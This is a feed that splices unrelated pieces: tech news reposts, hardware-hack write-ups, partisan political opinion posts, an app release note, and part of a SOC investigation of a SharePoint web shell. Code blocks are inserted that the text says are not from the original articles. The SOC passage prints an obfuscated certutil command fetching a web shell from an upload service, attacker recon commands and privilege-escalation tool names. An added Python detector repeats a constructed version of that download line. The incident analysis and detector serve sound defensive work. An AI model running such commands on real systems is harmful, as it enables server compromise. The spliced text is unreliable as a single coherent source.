Windows 11 24H2: The upgrade is blocked for AutoCAD 2022 users
Microsoft has decided to put a spoke in the wheels of anyone using AutoCAD 2022. With the Windows 11 24H2 update, some users found themselves unable to launch the software, forcing Redmond to step in with a compatibility hold. The result? If you have AutoCAD 2022 installed, Windows Update will refuse you the upgrade.
The problem: AutoCAD 2022 no longer opens
After installing version 24H2 of Windows 11, every release of AutoCAD 2022 becomes unusable on some devices. Users reported errors when launching the application, prompting Microsoft to confirm the problem in an update to the "Windows release health" section.
There is no problem with AutoCAD 2023, 2024 and 2025, which work normally and do not block the upgrade to Windows 11 24H2.
Microsoft steps in with a compatibility hold
To prevent users from ending up with an unusable AutoCAD, Microsoft has introduced a compatibility hold for PCs with AutoCAD 2022 installed.
IT administrators can check for this hold by looking for "safeguard ID: 56211213" in Windows Update for Business reports. Windows Home and Pro users, on the other hand, can check manually in the Windows Update settings.
Don't force the upgrade!
Microsoft warns that users with AutoCAD 2022 should not upgrade their PC manually with the Media Creation Tool or the Windows 11 Installation Assistant, at least until the problem has been resolved.
If your system is affected, you will see the message "Upgrade to Windows 11 is on its way to your device. There is nothing that requires your attention at the moment." along with a link to further details on the safeguard that has been put in place.
Not just AutoCAD: other holds on the way
This is not the only incompatibility Microsoft is handling. It recently removed a compatibility hold that was preventing the upgrade on some ASUS devices because of blue screen problems, which were fixed by a BIOS update.
Other software that has forced Microsoft to step in with similar holds includes:
- Dirac audio improvement software
- Asphalt 8 (Airborne)
- Integrated webcams
- Easy Anti-Cheat
- Safe Exam Browser
Conclusion
Microsoft and Autodesk are probably working on a patch to fix the problem. Until then, if you depend on AutoCAD 2022, the advice is simple: avoid upgrading to Windows 11 24H2!
In the meantime, users and IT administrators need to keep a close eye on any official updates or workarounds. If you have already upgraded and now have an unusable AutoCAD, you may need to consider rolling back to a previous version of Windows 11.
This situation highlights once again how crucial it is to test compatibility before rolling out system updates on machines that depend on business-critical software. It is advisable to follow Microsoft's and Autodesk's official communications for timely updates on the fix. Until there is a definitive solution, caution is required to avoid disruption to day-to-day operations.
The article Windows 11 24H2: The upgrade is blocked for AutoCAD 2022 users originally appeared on il blog della sicurezza informatica.
It wasn't that easy. I started by deleting all the photos and posts I had shared over the last 15 years. I tried to delete everything that could be deleted, even from the trash, and then I closed the profile. Even finding the little delete button was cumbersome, and then, once I had finally found it, the series of "Are you sure? Wouldn't you rather just take a break? You'll lose everything you've shared, are you really sure? Are you really, really sure?" began. At the end of the long procedure they still gave me 30 days to change my mind.
I have left the social metaverse and I'm happy. Like when I left the big supermarket chains, or when I left the big city.
My little page wasn't particularly uncomfortable: a hundred or so selected contacts with whom I shared thoughts, especially good shots and the results of bursts of creativity. I received feedback that encouraged me to keep doing it.
But for some time I had started to feel as uncomfortable as that time I took part in a craft market inside a shopping mall.
Here, in this new verse, which I started to look into a few years ago thanks to certain gatherings of the genuinely clandestine, I am getting comfortable. I'm starting to make my first timid contribution. Here, where, without fairy lights and air conditioning, the ladybirds breathe in the approach of spring and play at love.
Libsophia #10 – Diversity with Ermanno Ferretti
@Politica interna, europea e internazionale
The article Libsophia #10 – Diversity with Ermanno Ferretti originally appeared on Fondazione Luigi Einaudi.
Poetics
The poetic story of Maria Rosaria Madonna is truly singular in the landscape of contemporary poetry. Born in Palermo in 1940 and died in Paris in 2002, she published a single collection, titled Stige, which appeared in 1992 (with a preface by the great Amelia Rosselli; in 2020 an anthology would be printed that also includes her compositions […]
Making a PCR Machine Crypto Sign Its Results
Money, status, or even survival – there’s no shortage of incentives for faking results in the scientific community. What can we do to prevent it, or at least make it noticeable? One possible solution is cryptographic signing of measurement results.
Here’s a proof-of-concept from [Clement Heyd] and [Arbion Halili]. They took a ThermoFisher Scientific 7500 Fast PCR (Polymerase Chain Reaction) machine, isolated its companion PC software, and confined it to a pipeline that automatically signs each result with the help of an HSM (Hardware Security Module).
As many machines do, this one has to be paired to a PC running bespoke software. This one’s running Windows XP, at least! The software got shoved into a heavily isolated virtual machine running XP, protected by a TEE (Trusted Execution Environment). The software’s output is now piped through a data-diode virtual serial port out of the VM, immediately signed with the HSM, and the signed data is accessible through a read-only interface. Want to verify the results’ authenticity? Check them against the system’s public key, and you’re golden – in theory.
This design is just one part of the puzzle, given the typical chain of custody for samples in medical research, but it’s a solid start – and it happens to make the Windows XP setup more resilient, too.
Wondering what PCR testing is good for? Tons of things all over the medical field; for instance, we’ve talked about PCR in a fair bit of detail in this article about COVID-19 testing. We’ve also covered a number of hacker-built PCR and PCR-enabling machines, from deceptively simple to reasonably complex!
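The sign-then-verify step of that pipeline, as an added example in Go that is not [Clement Heyd] and [Arbion Halili]'s code: an in-process Ed25519 key stands in for the HSM (the real design keeps the private key inside the HSM), the result record's fields and the sample run are constructed, and the instrument name is a placeholder.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"fmt"
)

// MeasurementResult is a constructed stand-in for one PCR run's output; the
// field names are assumptions, not the 7500 Fast's real export format.
type MeasurementResult struct {
	Instrument string  `json:"instrument"`
	RunID      string  `json:"run_id"`
	Sample     string  `json:"sample"`
	Target     string  `json:"target"`
	Ct         float64 `json:"ct"`
	Timestamp  string  `json:"timestamp"`
}

// SignedRecord is what the read-only interface exposes: the exact result bytes
// that were signed, their SHA-256 digest and the detached signature (hex).
type SignedRecord struct {
	Result    json.RawMessage `json:"result"`
	Digest    string          `json:"sha256"`
	Signature string          `json:"signature"`
}

// Signer plays the HSM's role: callers get Sign() and the public key, never the
// private key. Here the key lives in process; in the real pipeline it would not.
type Signer struct{ priv ed25519.PrivateKey }

func NewSigner() (*Signer, error) {
	_, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &Signer{priv: priv}, nil
}

func (s *Signer) PublicKey() ed25519.PublicKey { return s.priv.Public().(ed25519.PublicKey) }

// Sign serialises the result (encoding/json writes struct fields in declaration
// order, so the bytes are stable), hashes it and signs the digest.
func (s *Signer) Sign(r MeasurementResult) (SignedRecord, error) {
	raw, err := json.Marshal(r)
	if err != nil {
		return SignedRecord{}, err
	}
	digest := sha256.Sum256(raw)
	sig := ed25519.Sign(s.priv, digest[:])
	return SignedRecord{Result: raw, Digest: hex.EncodeToString(digest[:]),
		Signature: hex.EncodeToString(sig)}, nil
}

// Verify is what an auditor runs with nothing but the public key: recompute the
// digest from the stored bytes, then check the signature over that digest.
func Verify(pub ed25519.PublicKey, rec SignedRecord) bool {
	digest := sha256.Sum256(rec.Result)
	if hex.EncodeToString(digest[:]) != rec.Digest {
		return false
	}
	sig, err := hex.DecodeString(rec.Signature)
	if err != nil || len(sig) != ed25519.SignatureSize || len(pub) != ed25519.PublicKeySize {
		return false
	}
	return ed25519.Verify(pub, digest[:], sig)
}

// Tamper models someone editing a stored result after the fact (lowering the Ct
// value) and even recomputing the digest; the signature still fails to verify.
func Tamper(rec SignedRecord, newCt float64) SignedRecord {
	var r MeasurementResult
	if err := json.Unmarshal(rec.Result, &r); err != nil {
		return rec
	}
	r.Ct = newCt
	raw, _ := json.Marshal(r)
	digest := sha256.Sum256(raw)
	return SignedRecord{Result: raw, Digest: hex.EncodeToString(digest[:]), Signature: rec.Signature}
}

func main() {
	signer, err := NewSigner()
	if err != nil {
		panic(err)
	}
	// Constructed sample run; none of these values come from a real instrument.
	res := MeasurementResult{Instrument: "7500 Fast (constructed)", RunID: "run-0001",
		Sample: "S-17", Target: "N gene", Ct: 24.3, Timestamp: "2025-03-03T04:00:00Z"}
	rec, _ := signer.Sign(res)
	fmt.Println("genuine record verifies:", Verify(signer.PublicKey(), rec))
	fmt.Println("tampered record verifies:", Verify(signer.PublicKey(), Tamper(rec, 18.0)))
}
```

The auditor side needs only Verify and the public key, which mirrors the read-only interface in the write-up. The digest comparison on its own only catches accidental corruption; the Tamper case shows that it is the signature over the digest that actually binds the result to the instrument's key.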
What Germany's election teaches us about foreign interference
Good morning! There's a bonus edition of Digital Politics this week. I'm Mark Scott, and I've spent the last six days assessing what to make of the recent German federal election on Feb 23.
Despite fears of record levels of foreign interference, the outcome was what almost everyone predicted. Already, some are claiming victory in the fight against online disinformation aimed at undermining the country's democratic institutions.
That would be a mistake. Below is a cross-post from my analysis for Tech Policy Press.
Let's get started:
Lessons from Germany's federal election
A week has passed since Germany’s federal election, and many are breathing a sigh of relief.
Friedrich Merz, a 69-year-old center-right politician, will almost certainly become the country’s next Chancellor, though a ruling coalition government — between Merz’s Christian Democratic Union (CDU) and the center-left Social Democratic Party (SPD) — won’t be formed until mid-April, at the earliest.
Alternative for Deutschland (AfD), a far-right party that garnered support from the likes of US Vice President JD Vance and Elon Musk, finished second in the election with just under 21 percent of the national vote. That party had found vocal support with younger, male voters, particularly in the Eastern parts of Germany, and had garnered significant traction across social media — particularly on Musk’s X, formerly known as Twitter.
Yet widespread fears around online election interference, either promoted by foreign countries like Russia or amplified by fringe domestic groups spreading conspiracy theories around alleged voter fraud or Germany’s supposed misguided support for Ukraine, did not materialize.
The result of Germany’s Feb 23 election was as many had predicted. The country’s vote now joins a growing list of national elections — including scores during 2024, a year in which more than two billion people voted globally — where close scrutiny from regulators, national security officials and outside researchers has found that foreign actors’ overt and clandestine efforts alike to sway voters’ decisions proved less successful than first imagined.
Thanks for reading Digital Politics. If you've been forwarded this newsletter (and like what you've read), please sign up here. For those already subscribed, reach out on digitalpolitics@protonmail.com
Yet the relief now felt in Germany — that the country’s democratic institutions withstood what national officials and outsiders claimed were unprecedented levels of election-related foreign interference — is misplaced.
It fundamentally misunderstands that digital attacks on countries’ electoral processes cannot be combated solely during short election campaign cycles, when heightened attention is aimed at such malign actors. Instead, foreign adversaries and the domestic groups that often amplify state-backed online propaganda are in this for the long haul — and their activities should be viewed over years, if not decades.
Why no one should claim 'mission accomplished'
Any claims — in Germany or other democratic countries — that national officials, tech companies and civil society groups were able to thwart digital interference attacks ahead of individual elections represent a false economy. For one, it’s almost impossible to link specific examples of online state-backed propaganda and covert influence campaigns to how voters cast ballots. For another, those online attacks don’t just stop because a country’s election cycle has come to an end.
Even as Merz’s CDU political party began haggling with the center-left SPD over a new coalition government, Russia’s state-backed media continued to sow dissent and division within Germany for its own political gain.
RT Deutschland — a Kremlin-backed media organization that, while banned within the European Union, is still widely accessible in Germany — pumped out article after article about how the Feb 23 election was unjust; that the failure to include AfD in the coalition government was anti-democratic; and that Germany’s ongoing support for Ukraine represented unjustified war-mongering.
If promoted by domestic actors, such talking points would be legal under the country’s free speech rules. But they were instead amplified by a foreign state adversary whose Kremlin-backed media outlets have been sanctioned because of “disinformation and information manipulation against the EU and its member states.”
Under long-standing political norms dating back to the aftermath of World War Two, Germany’s mainstream political parties have created a so-called “firewall” in which politicians will not allow groups associated with extremist movements, including the AfD, to join coalition governments.
Vance, the US Vice President, recently criticized such practices in a speech in Munich. “Democracy rests on the sacred principle that the voice of the people matters,” he said. “There’s no room for firewalls.”
It’s not just foreign adversaries that have continued to cast doubt on Germany’s election — even after the outcome was a foregone conclusion.
Across multiple Telegram channels, some of which have hundreds of thousands of followers, domestic influencers have spread false claims about rigged ballots; accusations that Germany should not support Ukraine because of its alleged starting of the war with Russia; and allegations the CDU wants to outlaw the AfD. Those messages have been further amplified, primarily on X, where some have garnered attention from non-German social media users and have been picked up by Russia’s state media.
Again, none of these falsehoods are illegal under German law, and they cannot be removed by platforms under the EU’s Digital Services Act. But this slow drip of inaccurate information — often within fringe social media communities where fact-checking does not exist — represents an ongoing threat to national democratic institutions, particularly when those domestic messages are further amplified by foreign adversaries.
Ahead of Germany’s Feb 23 election, the country’s officials held a so-called ‘stress test’ with the likes of Meta, TikTok, and X to war-game potential threats to the national vote. Klaus Müller, head of the national regulator in charge of the exercise, said his agency was “well prepared” to combat election-related problems. The European Commission also published advice for how national regulators should protect national elections.
Such efforts should not be reserved for the periods when countries hold elections.
In the ongoing whack-a-mole fight between national officials seeking to defend countries’ democratic institutions and foreign adversaries eager to undermine those norms via covert influence campaigns and outright online propaganda, it’s now a 24/7, 365-day battle — one that doesn’t just come to an end when the votes have all been counted.
A personal thought on a collective problem
When will Europe stop looking across the ocean as if every answer came from there? When will Europeans go back to using their own heads, without modelling themselves on states and leaders that have already shown their limits? It is time to cut the umbilical cord, to grow up, to dissolve the dependencies that make us fragile.
In recent years, American thinking has shown itself to be sick, trapped in a spiral of extremism, internal conflict and delusions of grandeur. And yet, despite the warning signs, there are still people in Europe who look at certain movements with admiration, without understanding the danger. The MAGA phenomenon, with its aggressive rhetoric and its nostalgia for an idealised past, is not just an American problem: it is a threat that risks contaminating us too.
Europe cannot afford to import failed models, to let itself be dragged into culture wars that do not belong to it, to become an echo of a society that struggles to stay on its feet. We must defend our political and cultural space, reaffirm our values, build an autonomous vision of the future. The world does not need faded copies of America: it needs a strong, aware, independent Europe.
@CDN p1 it really is a very broad discussion, but one that deserves to be addressed. It must be addressed.
As for travel, on my channel I always say that there is no need to go to the other side of the world: we have everything in Europe, and it would also be good to get to know our country (Europe) so that we really feel like European citizens.
And yet, this doesn't happen. It may be the least important of things, but it is still an example of the fact that we think in a not very cohesive way, as individuals rather than as a community.
Building a Nerf-like Rocket Launcher With Airburst Capability
Nerf blasters typically fire small foam darts or little foam balls. [Michael Pick] wanted to build something altogether more devastating. To that end, he created a rocket launcher with an advanced air burst capability, intended to take out enemies behind cover.
Unlike Nerf’s own rocket launchers, this build doesn’t just launch a bigger foam dart. Instead, it launches an advanced smart projectile that releases lots of smaller foam submunitions at a set distance after firing.
The rocket launcher itself is assembled out of off-the-shelf pipe and 3D printed components. An Arduino Uno runs the show, hooked up to a Bluetooth module and a laser rangefinder. The rangefinder determines the distance to the target, and the Bluetooth module then communicates this to the rocket projectile itself so it knows when to release its foamy payload after launch. Releasing the submunitions is achieved with a small microservo in the projectile which opens a pair of doors in flight, scattering foam on anyone below. The rockets are actually fired via strong elastic bands, with an electronic servo-controlled firing mechanism.
We’ve featured some great Nerf builds over the years, like this rocket-blasting robot.
Mozilla Has Second Thoughts: Can It Now Sell Your Personal Data?
Mozilla has changed its privacy policy, removing the promise never to sell Firefox users' personal data.
What happened
Previously, the company's FAQ contained the following: "No. We have never done it and we never will. And we protect you from many of the advertisers who do. Firefox products are designed to protect your privacy. That's a promise."
That statement has now disappeared, and the new privacy section states that Mozilla no longer makes such broad promises. The company explains this by saying that in some jurisdictions the term "sale of data" is interpreted too broadly.
Mozilla says it does not sell data in the usual sense of the term, but is obliged to share some information with partners. The company says such data is anonymised, aggregated or processed with privacy-enhancing technologies.
Users react: "This is unacceptable"
Following the update to the terms of service, users voiced their dissatisfaction in discussions on the support forum and on Reddit. They were particularly concerned by the clause under which, by entering their information into Firefox, users automatically grant the company a free, worldwide licence to use it.
Under pressure from critics, Mozilla then corrected the wording: the terms now clarify that the licence is required only for the browser to function and does not give the company ownership of user content. Many users remained unsatisfied, however. One of them noted: "This is not a matter of wording. You cannot demand such broad rights over users' data."
Mozilla also acknowledges that it shares search query keywords with partners, including location data, but assures users that it does so in anonymised form. The company points out that users can disable this feature in Firefox's settings.
Many, however, did not believe the company's explanations. One user replied to Mozilla's comment: "This is complete nonsense and you know it. The basic functionality of a browser is to load and display web pages."
The article Mozilla Has Second Thoughts: Can It Now Sell Your Personal Data? originally appeared on il blog della sicurezza informatica.
Stop Cyber Attacks Against Russia! US Cyber Command Has Been Halted
Last month, US Secretary of Defense Pete Hegseth ordered US Cyber Command to halt all planning of operations against Russia, including offensive cyber operations. Three sources familiar with the situation reported this.
Hegseth passed the order to the head of Cyber Command, General Timothy Ho, who in turn passed it to the outgoing director of operations, Marine Major General Ryan Heritage. According to the sources, the decision does not affect the National Security Agency (NSA), which Ho also heads, or its signals intelligence work against Russia.
General Timothy D. Ho
The move is part of the White House's efforts to normalise relations with Moscow, after the United States and its allies had sought to isolate the Kremlin over the conflict with Ukraine. Last week Trump met Zelensky in Washington to sign an agreement that would give the United States access to Ukrainian mineral resources. The deal fell through, however, after a heated argument in the Oval Office.
How long Hegseth's order will remain in force is unknown, but Cyber Command has been told the restrictions will stay in place indefinitely. Heritage, who knows all of the command's operations, must now communicate the order to the appropriate units, including the 16th Air Force Cyber Command, which is responsible for digital operations in the US European Command area.
Cyber Command is currently preparing a risk assessment report for Hegseth, which is expected to include a list of the cancelled operations and of potential threats from Russia.
If the restrictions applied only to the units engaged in cyber operations against Moscow, hundreds of specialists in the Cyber National Mission Force and the Cyber Mission Force would be affected. If they also covered intelligence units and analysts, however, thousands of employees would be affected, including NSA specialists.
Hegseth's order coincides with Cyber Command's efforts to step up operations against Mexican drug cartels, eight of which were recently designated as terrorist organisations by the Trump administration.
Senior White House officials are calling for aggressive military action against the cartels to stem the flow of drugs into the United States.
The article Stop Cyber Attacks Against Russia! US Cyber Command Has Been Halted originally appeared on il blog della sicurezza informatica.
Goodbye Skype, Forever! Microsoft shuts down the video-call pioneer after 20 years of service
In the world of technology, few names evoke as much nostalgia as Skype. Yet after two decades of honourable service, Microsoft has decided to switch off for good the platform that revolutionised digital communication in the early 2000s. From May, Skype "will no longer be available", the company confirmed on X, inviting users to migrate to Microsoft Teams, its ever-expanding communication service.
From innovation to oblivion
Skype was a pioneer, a piece of software that slashed the cost of international calls and connected the world with a simplicity that had been unimaginable until then. Born in Estonia in 2003, the service spread rapidly, so much so that it caught the attention of eBay, which bought it in 2005 for 2.6 billion dollars. The marriage between e-commerce and VoIP telephony did not work out, however, and in 2009 eBay sold its majority stake to a consortium of investors for 1.9 billion dollars.
In 2011, Microsoft entered the scene with a mammoth acquisition: 8.5 billion dollars in cash to bring Skype into its stable. At the time, the move seemed set to consolidate Redmond's position in the communications sector. As the years passed, however, the Skype brand began to lose its appeal.
What happens to Skype users?
For those still using Skype, Microsoft has planned a transition period until May 2025. Users will be able to transfer contacts, chat history and credit directly to Teams using the same credentials. Until the final shutdown, Skype and Teams will also remain interoperable, letting users communicate with each other regardless of the platform they choose.
Those who do not want to move to Teams will instead be able to download and export their chat history before the shutdown. As for Skype subscriptions and calling credit, Microsoft will guarantee their transfer to Teams, so as not to penalise users who still use the service for international calls.
A decline foretold
Despite a temporary revival during the pandemic, when video conferences and online calls became the norm, Skype has had to face ruthless competition. Zoom, Google Meet, WebEx, Apple FaceTime and WhatsApp gradually eroded its dominance, offering more modern alternatives integrated with their respective ecosystems. Meanwhile, Microsoft concentrated more and more resources on Teams, integrating it with Microsoft 365 and targeting the business market.
The shutdown of Skype marks the end of an era, but also an important lesson: in the world of technology, innovation is a never-ending race, and even giants can fall into oblivion if they fail to adapt to changes in the market.
For those who used Skype in its golden years, its farewell is a moment of nostalgia. For Microsoft, though, this is just another step towards a future in which Teams is destined to dominate digital communications.
The article Goodbye Skype, Forever! Microsoft shuts down the video-call pioneer after 20 years of service originally appeared on il blog della sicurezza informatica.
I'm wondering what else needs to happen before we understand that Trump is, in the best case, part of a plan of his own and Putin's to subjugate Ukraine and Europe, and many other things.
In the worst case, he is outright on Putin's payroll.
For me it's the latter; it seems more and more obvious.
Americans, what do we want to do?
Phytoremediation to Clean the Environment and Mine Critical Materials
Nickel contamination can render soils infertile at levels that are currently impractical to treat. Researchers at UMass Amherst are looking at how plants can help these soils and source nickel for the growing EV market.
Phytoremediation is the use of plants that preferentially hyperaccumulate certain contaminants to clean the soil. When those contaminants are also critical materials, you get phytomining. Starting with Camelina sativa, the researchers are looking to enhance its preference for nickel accumulation with genes from the even more adept hyperaccumulator Odontarrhena to have a quick-growing plant that can be a nickel feedstock as well as produce seeds containing oil for biofuels.
Although it can reach up to 3% Ni by weight, Odontarrhena was ruled out as a candidate in its own right because it grows slowly and is invasive in the United States. The researchers are also looking into which soil amendments can best help this super Camelina sativa achieve its goals. It’s no panacea for expected nickel demand, but they do project that phytomining could provide 20-30% of our nickel needs for 50 years, at which point the land could be turned back over to other uses.
Recycling things already in technical cycles will be important to a circular economy, but being able to remove contaminants from the environment’s biological cycles and place them into a safer technical cycle, instead of just burying them, will be a big benefit as well. If you want to learn about a more notorious heavy metal, check out our piece on the blessings and destruction wrought by lead.
@RaccoonForFriendica version 0.4.1 has finally been released! I was waiting to fix a couple of old issues but I realized I was keeping people waiting too long, since almost 2 months had passed since the previous stable version.
If you were on the latest beta, the only new feature is the possibility to see in every timeline the "source platform" each post is coming from (Friendica, Mastodon, Lemmy, Misskey/Sharkey, Pleroma/Akkoma, Kbin/Mbin, WordPress, GNU Social, Pixelfed, Peertube, GoToSocial, Diaspora, generic ActivityPub and more are coming).
If you were using 0.4.0 there are a ton of improvements, the most important of which are:
- feat: add per-user rate limits;
- feat: suggest hashtags while typing;
- feat: swipe navigation between posts;
- feat: exclude stop words from timelines;
- feat: add shortcuts to other instances ("guest mode");
- feat: open post detail as thread;
- feat: post translation;
- feat: followed hashtag indication;
- feat: show source protocol for posts;
- enhancement: support for embedded images.
This version is also available in the production track on Google Play, so you don't have to participate in the beta program any more to get it.
Let me know what you think about it, enjoy your weekend and as always #livefasteattrash
#friendica #friendicadev #androidapp #androiddev #fediverseapp #raccoonforfriendica #kotlin #multiplatform #kmp #compose #cmp #opensource #foss #procyonproject
OK, seen it. It is due to encrypted shared preferences (used to store your auth token on the device). They fail to open after you restore the app, probably because they can't be decrypted, since the key changes when you reinstall it. I'll investigate more to see if there are workarounds.
Seemingly it is a known issue.
Building an Interferometer With Lego
Lego! It’s a fun toy that is popular around the world. What you may not realize is that it’s also made to incredibly high standards. As it turns out, the humble building blocks are good enough to build an interferometer, if you’re so inclined to want one. [Kyra Cole] shows us how it’s done.
The build in question is a Michelson interferometer; [Kyra] was inspired to build it based on earlier work by the myphotonics project. She was able to assemble holders for mirrors and a laser, as well as a mount for a beamsplitter, and then put it all together on a Lego baseboard. While some non-Lego rubber bands were used in some areas, ultimately, adjustment was performed with Lego Technic gears.
Not only was the Lego interferometer able to generate a proper interference pattern, [Kyra] then went one step further. A Raspberry Pi was rigged up with a camera and some code to analyze the interference patterns automatically.
[Kyra] notes that using genuine Lego bricks was key to her success. Their high level of dimensional accuracy made it much easier to achieve her end goal. Sloppily-built knock-off bricks may have made the build much more frustrating to complete.
We don’t feature a ton of interferometer hacks around these parts. However, if you’re a big physics head, you might enjoy our 2021 article on the LIGO observatory. If you’re cooking up your own physics experiments at home, don’t hesitate to drop us a line!
[Thanks to Peter Quinn for the tip!]
The Digital Packrat Manifesto
DRM and big tech's war on ownership has led me to make my own media libraries, and you should too. Janus Rose (404 Media) #Streaming #DataHoarding
The SOC files: Chasing the web shell
Web shells have evolved far beyond their original purpose of basic remote command execution, and many now function more like lightweight exploitation frameworks. These tools often include features such as in-memory module execution and encrypted command-and-control (C2) communication, giving attackers flexibility while minimizing their footprint.
This article walks through a SOC investigation where efficient surface-level analysis led to the identification of a web shell associated with a well-known toolset commonly associated with Chinese-speaking threat actors. Despite being a much-discussed tool, it is still used by the attackers for post-exploitation activities, thanks to its modular design and adaptability. We’ll break down the investigative process, detail how the analysts uncovered the web shell family, and highlight practical detection strategies to help defenders identify similar threats.
Onset
It’s early Monday morning, almost 4 a.m. UTC, and the apparent nighttime calm inside the SOC is abruptly interrupted by an alert from our SIEM. It indicates that Kaspersky Endpoint Security’s heuristic engine has detected a web shell (HEUR:Backdoor.MSIL.WebShell.gen) on the SharePoint server of a government infrastructure in Southeast Asia, a warning that no SOC analyst would want to ignore.
C:\Windows\System32\inetsrv\w3wp.exe -ap "SharePoint" [...]
└── "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il -u""""r""""l""""c""""a""""c""""h""""e"""" -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx 404.aspx
└── C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\[REDACTED]\[REDACTED]\App_Web_404.aspx.[REDACTED].[REDACTED].dll
The night shift team springs into action, knowing that the web shell could be the beginning of much worse activity, and that every second counts. Initial analysis of the telemetry suggests that the attackers exploited the affected web server, either by taking advantage of another web shell or a command injection vulnerability.
From the listing above, where the process tree that triggered the first detection is reported, it is possible to observe an attempt to deploy a web shell disguised as a 404 page. The certutil utility was used to download the ASPX payload, which was hosted by abusing Bashupload. This web service, which is used to upload files from the command line and allows one-time downloads of samples, is no stranger to being abused as an ingress tool transfer technique.
As is common practice, the command has been slightly obfuscated by using escape characters (such as ^ and "") to break up the keywords "certutil" and "urlcache" in order to bypass basic detection rules based on simple pattern matching.
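One way to make such a rule robust is to normalize the command line the way cmd.exe itself does before matching. The following is an added example, not code from the original article or from the SOC team; the sample command lines are constructed for the demo (modelled on the process tree above, with a reserved example.invalid hostname), and the function and variable names are our own.

```python
import re
from typing import Optional

# Constructed sample command lines for the demo (not the original telemetry).
# The first one mirrors the caret/empty-quote obfuscation shown in the process
# tree above; example.invalid is a reserved, non-routable hostname.
SAMPLE_COMMAND_LINES = [
    '"cmd.exe" /c cd /d "C:\\inetpub\\wwwroot"&,;;;,@cer^t^u^t^il '
    '-u""""r""""l""""c""""a""""c""""h""""e"""" -split -f '
    'https://example.invalid/404.aspx 404.aspx',
    'certutil -hashfile C:\\Windows\\notepad.exe SHA256',
    'cmd.exe /c echo hello',
]

# Server-side script extensions that certutil should never be fetching on a
# web server; a download ending in one of these is a likely web shell drop.
WEB_SHELL_EXTENSIONS = (".aspx", ".ashx", ".asmx", ".asp", ".php", ".jsp", ".jspx")


def normalize_cmd_line(cmd: str) -> str:
    """Undo the cheap cmd.exe tricks that split keywords across characters.

    cmd.exe strips these before the program ever sees its arguments, so the
    detection rule compares against the same normalized form:
      - '^' is the cmd.exe escape character: cer^t^u^t^il -> certutil
      - '""' is an empty quoted string that the parser drops: u""r""l -> url
      - runs of ',' and ';' act as argument separators (whitespace)
      - a leading '@' only suppresses echo and is not passed to the program
    """
    s = cmd.replace("^", "")
    s = s.replace('""', "")
    s = re.sub(r"[,;]+", " ", s)
    s = re.sub(r"(^|[\s&|])@+", r"\1", s)
    return s.lower()


# Matches certutil's URL-cache fetch with an explicit output file, after
# normalization; the URL is captured for triage.
CERTUTIL_DOWNLOAD = re.compile(
    r"certutil(?:\.exe)?\b.*?-urlcache\b.*?-f\s+(?P<url>\S+://\S+)",
    re.IGNORECASE,
)


def detect_certutil_download(cmd: str) -> Optional[dict]:
    """Return details if the (normalized) command line is a certutil URL fetch."""
    normalized = normalize_cmd_line(cmd)
    m = CERTUTIL_DOWNLOAD.search(normalized)
    if not m:
        return None
    url = m.group("url")
    path = url.split("?", 1)[0]
    return {
        "url": url,
        "web_shell_drop": path.endswith(WEB_SHELL_EXTENSIONS),
        # True when normalization changed the text, i.e. escapes were present
        "obfuscated": normalized != cmd.lower(),
    }


def scan(command_lines) -> list:
    """Run the detector over a batch of command lines; return (index, hit) pairs."""
    hits = []
    for idx, cmd in enumerate(command_lines):
        result = detect_certutil_download(cmd)
        if result:
            hits.append((idx, result))
    return hits


if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_COMMAND_LINES):
        print(idx, hit)
```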
As part of our MDR service, we are required to operate within pre-established boundaries that are tailored to the customer’s business continuity needs and risk tolerance. In this case, the customer retains ownership of decisions regarding sensitive assets, including the isolation of compromised hosts, so we can’t instantly block the attack and must continue to observe and perform a preliminary threat analysis.
A manual reconnaissance and discovery activity by an operator starts appearing, and despite the tension, an occasional typo (“localgorup”) manages to draw a smile:
whoami
net user
query user
net localgorup administrators
net localgroup administrators
whoami /all
"cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il[...]
Aftermath
To gain system privileges, the threat actors used several variants of the well-known Potato tools, either as memory-only modules or as standalone executables:
Paths:
C:\ProgramData\DRM\god.exe
C:\Users\Default\Videos\god.exe
MD5: 0xEF153E1E216C80BE3FDD520DD92526F4
Description: GodPotato
Process: C:\Windows\System32\inetsrv\w3wp.exe
MD5 (memory region): 0xB8A468615E0B0072D2F32E44A7C9A62F
Description: BadPotato
Original filename: BadPotato.dll
MD5 (memory region): 0xB5755BE4AAD8D8FE1BD0E6AC5728067B
Description: SweetPotato
Original filename: SweetPotato.dll
To bring standalone binaries into the environment, the attackers again used the Bashupload free web service, which we saw in the initial web shell alert. Of all the tools, the GodPotato standalone binary ultimately succeeded in gaining system privileges.
With elevated access, the attackers moved on to domain trust enumeration, mapping relationships between domains and identifying potential targets for lateral movement. But let’s get back to the main question: What kind of web shell are we dealing with here?
Identifying the threat
Unfortunately, we were unable to retrieve the web shell sample used during the initial access phase. However, starting with the privilege escalation phase, several .NET modules began to appear in the memory of the IIS worker process (w3wp.exe), ranging from popular tools like Potato to other lesser-known ones. One set of libraries in particular caught our attention, so we decided to investigate further by performing a manual inspection.
Fortunately, the libraries were not obfuscated and lent themselves to quick static analysis:
Example of a library detected in IIS process memory (0x0B593115C273A90886864AF7D4973EED)
In the image above, if you look at the orange method names in the Assembly Explorer on the left, you can observe some peculiarities that can be used to identify similar samples. Although many of the method names are very generic, there is one that is quite unique, EnjsonAndCrypt. A quick Google search of this name yields no results, which means it may be sample-specific.
The getExtraData method is also interesting: although it has a non-specific name, there is a sequence of bytes [126, 126, 126, 126, 126, 126] that is used to parse key:value pairs whose value is base64 encoded:
The “extraData” structure example
Threat actors need to keep using the same byte sequence if they want to maintain backward compatibility across different implant versions. On its own, however, the sequence is very generic, so we combine both indicators, the getExtraData name and this byte array, into a sufficiently precise condition, and use it alongside EnjsonAndCrypt to build a detection rule.
Uncovering modules and variants
By feeding our newly created YARA rule to a multi-AV platform such as VirusTotal, we can identify additional samples that differ from those observed in the targeted infrastructure. It is worth noting that some of these have a poor detection rate:
Poorly detected BasicInfo.dll (32865229279DE31D08166F7F24226843) sample
Below are the most common names of libraries that match the rule:
BShell.dll
BasicInfo.dll
Cmd.dll
Database.dll
Echo.dll
Eval.dll
FileOperation.dll
Hs.dll
